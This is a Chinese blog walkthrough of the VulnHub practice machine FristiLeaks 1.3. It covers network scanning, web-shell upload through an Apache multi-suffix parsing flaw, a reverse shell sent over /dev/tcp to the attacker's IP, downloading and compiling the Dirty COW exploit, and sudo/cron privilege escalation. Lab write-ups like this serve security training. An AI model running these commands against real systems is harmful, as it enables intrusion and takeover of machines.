FRISTILEAKS: 1.3打靶渗透【附代码】(权限提升)

已于 2024-08-01 21:22:41 修改
阅读量926 收藏 23
点赞数 28
分类专栏: 打靶日常 文章标签: 网络安全 web安全 笔记 学习 经验分享
于 2024-08-01 21:07:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52487093/article/details/140857474
版权

靶机下载地址:FristiLeaks: 1.3 ~ VulnHubFristiLeaks: 1.3, made by Ar0xA. Download & walkthrough links are available.icon-default.png?t=N7T8https://www.vulnhub.com/entry/fristileaks-13,133/

1. 主机发现+端口扫描+目录扫描+敏感信息收集

1.1. 主机发现:

nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:A5:A6:76'

1.2. 端口扫描:

nmap -p- 192.168.7.188

1.3. 目录扫描:

dirb http://192.168.7.188

1.4. 敏感信息收集:

操作系统:centOS;中间件Apache 2.2.15【后边有用】;语言php

2. WEB漏洞挖掘

2.1. 进入80端口

1.拼接目录扫描出的文件,/robots.txt

2.逐个拼接尝试【无用】 -> 返回初始页面,老规矩,逐个点就功能点,寻找疑似漏洞点 -> 拼接/fristi,进入一个登录页面

3.尝试万能密码无果,右键查看网站源代码 -> 发现图片下方存在一段base64加密字段,尝试解密

解码发现为png格式的数据信息,尝试利用kali自带的工具破解

4,将base64加密字段放入test.txt文件中,执行下方代码破解

base64 -d test.txt > test.png # base64 解码
cat test.png #查看
strings test.png
sz test.png # sz发送给自己 稍微等十几秒 按一下上下左右的右->键 一般就出来了

5.成功解析出一个图片,可能是账号也可能是密码

6.当初网页源代码也存在数据,疑似账号或者密码,尝试登录吧 -> 尝试得出账号密码[eezeepz:keKkeKKeKKeKkEkkEk]

2.2. 登入后台【eezeepz:keKkeKKeKKeKkEkkEk】

存在文件上传功能点 -> 尝试上传一句话木马文件 -> 黑白名单 无法利用文件上传漏洞

2.3. 尝试利用NDay获取权限

我们最初的漏洞流程挖掘流程起作用了,由于中间件为apache2.2.15版本,存在Apache HTTPD 多后缀解析漏洞:在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件。

1.尝试上传xxxxx.php.jpg文件

2.上传+改包

3.上传文件后给了路径 ->尝试蚁剑链接

2.4. 反弹shell至kali准备提权

nc -lvnp 4444 #kali打开监听接收
sh -i >& /dev/tcp/192.168.7.36/4444 0>&1 #在蚁剑执行反弹shell语句

3. 权限提升

3.1. 脏牛提权

1.权限为普通用户

2.查看版本信息

uname -a #查看系统的内核版本,为Linux 2.6.32-573.8.1.el6.x86_64

直接使用经典的脏牛漏洞,该漏洞影响 Linux 2.6.22 版本至 4.6 版本的所有 Linux 系统。

3.查找脏牛脚本 -> 用一个符合版本的脚本,将其导到当前路径

searchsploit 'Dirty COW'
searchsploit -m 40839.c

4.开启一个临时http服务,利用weget下载至靶机并赋予执行权限

python3 -m http.server 8001
wget 192.168.7.37:8001/40839.c
chmod +x 40839.c

5.编译并运行,密码自己设置,我这里设置6个6

gcc -pthread 40839.c -o 40839 -lcrypt
./40839

7.转换用户 -> 提权成功

su firefart

3.2. SUDO提权

1.返回/home,存在三个用户【admin\eezeepz\fristgod】

在eezeepz家目录下找到notes.txt

2.执行如下命令 -> 查看/tmp/cronresult

echo '/usr/bin/../../bin/chmod -R 777 /home/admin' > /tmp/runthis
cat /tmp/cronresult

3.成功cd到admin用户 -> 打开那两个txt文件,发现存着两个base64数据

cd /home/admin

cat cryptedpass.txt

mVGZ3O3omkJLmy2pcuTq

cat whoisyourgodnow.txt

=RFn0AKnlMHMPIzpyuTI0ITG

4.打开.py文件,存在一个加密脚本

import base64,codecs,sys

def encodeString(str):

base64string= base64.b64encode(str)

return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])

print cryptoResult

5.尝试逆转机密机制,并将脚本保存到kali的test2.py文件中

import base64,codecs,sys

def decodeString(str):
  rot13string = codecs.decode(str[::-1], 'rot13')
  return base64.b64decode(rot13string)

print(decodeString(sys.argv[1]))

6.运行test2.py解密程序,解密两组base64数据

python test2.py mVGZ3O3omkJLmy2pcuTq
>>>b'thisisalsopw123'

python test2.py =RFn0AKnlMHMPIzpyuTI0ITG
>>>b'LetThereBeFristi!'

7.登录fristigod,发现并不是root权限

su fristigod
LetThereBeFristi!

8.history查看历史命令,发现执行命令时会使用sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

使用root权限输入命令后,加/bin/bash提权成功

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash

橙则Kucei
关注
  • 28
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
HTB打靶日记:Stocker
01-15
这表明,即使有限的权限也可以被利用来提升权限,尤其是在系统配置不当的情况下。 总结起来,"Stocker"靶场案例展示了多种常见的安全漏洞和攻击手段,包括信息收集、子域名爆破、NoSQL注入、XSS漏洞利用、权限提升...
Vulnhub靶机:FristiLeaks_1.3
最新发布
qq_48904485的博客
03-19 1007
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:FristiLeaks 1.3(10.0.2.12)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/fristileaks-13,133/注意安装靶机的时候需要将靶机的MAC地址改为:08:00:27:A5:A6:76,否则靶机ip地址会获取不到。
Vulnhub 渗透练习(七)—— FRISTILEAKS: 1.3
shinygod的博客
02-19 564
仔细阅读一些留言或者是解释。可以利用漏洞探针快速查询漏洞。脏牛的简单利用,及影响版本。
Vulnhub靶机渗透FRISTILEAKS: 1.3
Mysmycbx的博客
05-27 2068
信息收集很难,需要总结
【vulnhub】---FristiLeaks_1.3靶机
qq_43168364的博客
08-22 983
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:FristiLeaks: 1.3靶机(192.168.15.155) 攻击机:kali Linux(192.168.15.129) 相关设置 根据官网的提示这里需要给靶机设置MAC地址 设置好了之后就可以开心的玩耍了。 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:arp-scan -l 命令:netdiscover -i eth0 -r
靶机渗透FristiLeaks1.3 ☀️新手详细☀️
君莫hacker的博客
09-08 7755
靶机FristiLeaks1.3的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/fristileaks-13,133/ 作者 Ar0xA 发布日期 2015年12月14日 难度 中等 靶机基本介绍: 一个小型虚拟机是为一个叫做Fristileaks的荷兰非正式黑客聚会而设计的。意味着可以在几个小时内完成,
作品:《打靶游戏》.rar
12-15
作品: 《打靶游戏》.rar
U3D 打靶游戏 demo 要源代码 可以联系我
09-25
【Unity3D(U3D)打靶游戏开发详解】 Unity3D,简称U3D,是一款强大的跨平台游戏开发引擎,广泛应用于游戏、虚拟现实(VR)、增强现实(AR)等多个领域。这款引擎以其易用性、高效性能以及丰富的资源库著称,使得...
scratch编程项目源代码文件案例素材-[打靶游戏].zip
05-16
Scratch是一款由麻省理工学院(MIT)的...此外,通过实践和修改源代码,还可以学习到调试和优化程序的方法,进一步提升编程技能。这个案例不仅适合少儿趣味编程,也对想要了解游戏编程的初学者提供了很好的实践平台。
打靶-少儿编程scratch项目源代码文件案例素材.zip
11-07
总的来说,"打靶-少儿编程scratch项目源代码文件案例素材.zip"提供了一个很好的平台,让孩子们在动手实践中学习编程,理解基本的编程逻辑,并通过游戏化的方式提升他们的编程兴趣和技能。无论是对于初次接触编程的...
FristiLeaks_1.3#攻略
qq_27466929的博客
09-21 1105
FristiLeaks_1.3#攻略
【甄选靶场】Vulnhub百个项目渗透——项目十六:FristiLeaks_1.3(文件上传,py脚本改写,sudo提权,脏牛提权,源码获取)
人间体佐菲的博客
09-18 966
网络安全,基础,靶场,信息安全渗透测试,红队
VulnHub渗透测试实战靶场 - FRISTILEAKS: 1.3
LYJ20010728的博客
08-06 1450
VulnHub渗透测试实战靶场 - FRISTILEAKS: 1.3环境下载TOPHATSEC: FRESHLY靶机搭建渗透测试信息搜集漏洞挖掘 环境下载 戳此进行环境下载 TOPHATSEC: FRESHLY靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式,虚拟机的MAC地址为:08:00:27:A5:A6:76 获取到目标靶机的IP为:192.168.246.132 渗透测试 信息搜集 用Nmap扫描一下目标靶机:sudo nmap -sS -A 192.168.246.
vulnhub渗透系列之FristiLeaks: 1.3
来到了学渣的博客
02-06 2122
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 实验过程总结 1.该靶机安装好后自动提示了IP地址,所以直接探测存活的端口就行,发现与以往不一样的是它只开放了80端口,nmap同时也扫出来cola/sisi/beer三个目录。 2.进入80端web页面,登录到cola/sisi/beer发现图片提示主要...
vulnhub FristiLeaks: 1.3
箭雨镜屋
02-04 2259
渗透思路: nmap扫描----->查看robots.txt,并根据主页信息推测出admin portal的url----->查看网页源代码,分析注释,base64解码出包含重要信息的png图片----->hydra暴力破解网站用户名密码(其实不需要暴力破解)----->利用文件上传(apache httpd多后缀文件解析漏洞)获得反弹shell----->利用定时文件修改目录权限----->编写python脚本解码,得到admin和fristigod的密码----->sudo提权获得root权限
FristiLeaks_1.3
cxyzupup的博客
01-10 764
FristiLeaks_1.3 项目地址:https://www.vulnhub.com/entry/fristileaks-13,133/ 提示: (1)靶机网络连接方式使用NAT模式 (2)该靶机做了地址绑定,因此需要设置固定物理地址才能获取IP地址;物理地址为:08:00:27:A5:A6:76 文章目录FristiLeaks_1.3一、信息收集1. 使用nmap收集端口服务信息:2. 查看tcp80端口:3. 使用gobuster工具对http服务进行枚举:3.1 查看/images目录:3.2 查
VulnHub-FRISTILEAKS 1.3
热门推荐
江左盟的博客
12-02 1万+
简介 这是一台CTF类的靶机,比较考验脑洞,我个人不大喜欢,能想到作者的设计的点会觉得简单,想不到就觉得难。该靶机通过网页源码获取登录用户名和密码,然后利用Apache解析漏洞获取服务器权限,可利用脏牛直接提升至root用户权限,也可利用计划任务先获取admin用户权限,然后解密密文获得fristigod用户登录密码,最后利用SUID程序提升至root权限。 靶机下载地址:https://www.vulnhub.com/entry/fristileaks-13,133/ 信息收集 使用nmap --min-
靶机:FristiLeaks_1.3
AzVoidSUN的博客
05-10 880
下载连接 https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent https://download.vulnhub.com/fristilea ks/FristiLeaks_1.3.ova 运行环境 Virtualbox (二选一) Vnware Workstation player VMware用户将需要手动将VM...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

橙则Kucei

感谢您的喜欢

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值